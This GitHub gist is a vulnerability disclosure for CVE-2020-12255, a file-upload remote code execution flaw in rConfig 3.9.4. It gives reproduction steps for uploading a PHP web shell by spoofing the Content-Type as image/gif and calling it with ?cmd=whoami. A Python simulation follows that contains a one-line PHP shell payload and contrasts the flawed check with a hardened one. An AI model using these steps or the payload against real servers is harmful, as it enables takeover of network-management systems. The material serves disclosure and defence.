@farid007
Last active November 15, 2022 06:17
Rconfig 3.9.4 File Upload RCE
Remote Code Execution via File Upload (CVE-2020-12255)
rConfig 3.9.4 is vulnerable to remote code execution because the file upload functionality does not properly validate uploaded files.
vendor.crud.php accepts an upload based only on the client-supplied Content-Type of the multipart file part; it does not restrict uploads by file extension or by checking the file header (magic bytes).
Because the check relies on a value the client controls, an attacker can upload a PHP file containing arbitrary code (a web shell) and simply change the Content-Type of that part to `image/gif` in the request to vendor.crud.php.
The server accepts the file and stores it under the web root, so requesting the uploaded file executes the PHP code and returns its output in the response.
Steps To Reproduce:
1. Log in to the application.
2. Go to https://ip-rconfig/vendors.php and click on ‘Add Vendor’.
3. Click Browse, select a PHP file that contains a backdoor or shell, and intercept the upload request with Burp Suite.
4. In the intercepted request, change the `Content-Type` of the file part to `image/gif` and forward it.
5. Go to https://ip-rconfig/images/vendor/shell.php?cmd=whoami
Note: shell.php is the uploaded file; the command output in the response confirms code execution.
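The following is an added example, not code from the gist or from rConfig. It models the upload check described above in Python: it builds the multipart request as a browser (or Burp, after step 4) would send it, parses it the way a minimal server would, and runs the file through two checks, one that trusts only the client-supplied Content-Type (the flaw described for vendor.crud.php) and a hardened one that allow-lists the extension and verifies the file header. The form field name, boundary, allowed types and the PHP payload are constructed assumptions; the real field name in vendor.crud.php is not shown in the gist.

```python
import re

# Constructed values for this example; the real form field and boundary are not
# shown in the gist.
BOUNDARY = "----WebKitFormBoundaryPoC"
FIELD = "vendorLogo"

# MIME types and extensions a vendor-logo upload might reasonably allow (assumption).
ALLOWED_TYPES = {"image/gif", "image/png", "image/jpeg"}
ALLOWED_EXT = {"gif", "png", "jpg", "jpeg"}
# File-header (magic byte) signatures for the allowed image formats.
MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}


def build_multipart(field, filename, content_type, data):
    """Build the multipart/form-data request as the browser (or Burp, after editing
    the part's Content-Type) would send it. Returns (headers, body)."""
    body = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n"
        f"\r\n"
    ).encode() + data + f"\r\n--{BOUNDARY}--\r\n".encode()
    headers = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}"}
    return headers, body


def parse_multipart(headers, body):
    """Minimal server-side parse of the first file part.
    Returns (filename, declared content type, raw bytes) or None."""
    boundary = re.search(r"boundary=([^;]+)", headers["Content-Type"]).group(1).strip('"')
    for chunk in body.split(b"--" + boundary.encode()):
        if not chunk.startswith(b"\r\n"):        # preamble, or the closing "--"
            continue
        head, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):            # CRLF before the next boundary is not data
            content = content[:-2]
        name = re.search(rb'filename="([^"]*)"', head)
        if not name:
            continue                              # ordinary form field, not a file
        ctype = re.search(rb"Content-Type:\s*([^\r\n]+)", head, re.I)
        declared = ctype.group(1).decode().strip().lower() if ctype else ""
        return name.group(1).decode(), declared, content
    return None


def vulnerable_accept(filename, content_type, data):
    """Models the flawed check described above: the decision rests solely on the
    client-supplied Content-Type, which the attacker sets to image/gif."""
    return content_type in ALLOWED_TYPES


def hardened_accept(filename, content_type, data):
    """Allow-list the extension and require the file header to match it; the
    declared Content-Type is ignored because the client controls it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False
    expected = "jpg" if ext == "jpeg" else ext
    return any(data.startswith(magic) and kind == expected for magic, kind in MAGIC.items())


def demo():
    """Run three uploads through both checks. Returns {case: (vulnerable, hardened)}."""
    php_shell = b"<?php system($_GET['cmd']); ?>"     # constructed stand-in for shell.php
    gif = b"GIF89a" + b"\x00" * 10                    # constructed, header only
    cases = {
        "php_honest": build_multipart(FIELD, "shell.php", "application/x-php", php_shell),
        "php_as_gif": build_multipart(FIELD, "shell.php", "image/gif", php_shell),   # step 4
        "real_gif":   build_multipart(FIELD, "logo.gif", "image/gif", gif),
    }
    results = {}
    for case, (headers, body) in cases.items():
        filename, declared, data = parse_multipart(headers, body)
        results[case] = (vulnerable_accept(filename, declared, data),
                         hardened_accept(filename, declared, data))
    return results


if __name__ == "__main__":
    for case, (vuln, hard) in demo().items():
        print(f"{case:11s} vulnerable check: {vuln!s:5s} hardened check: {hard}")
```

The `php_as_gif` case is the gist's step 4: the same PHP bytes are rejected by the vulnerable check when sent honestly and accepted once the part's Content-Type reads `image/gif`, while the hardened check rejects both because the extension is not allowed and the bytes carry no image header. In a real fix the stored filename should also be generated server-side and the upload directory served without PHP execution, so that even a file that slips past the content check cannot be invoked as in step 5.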
@F-Masood

F-Masood commented May 8, 2021

@zztczcx

zztczcx commented May 9, 2021

Good, it works

@F-Masood

̿̿ ̿̿ ̿̿ ̿'̿'\̵͇̿̿\з= ( ▀ ͜͞ʖ▀) =ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿̿ ̿̿

@Steiner-254

Interesting!
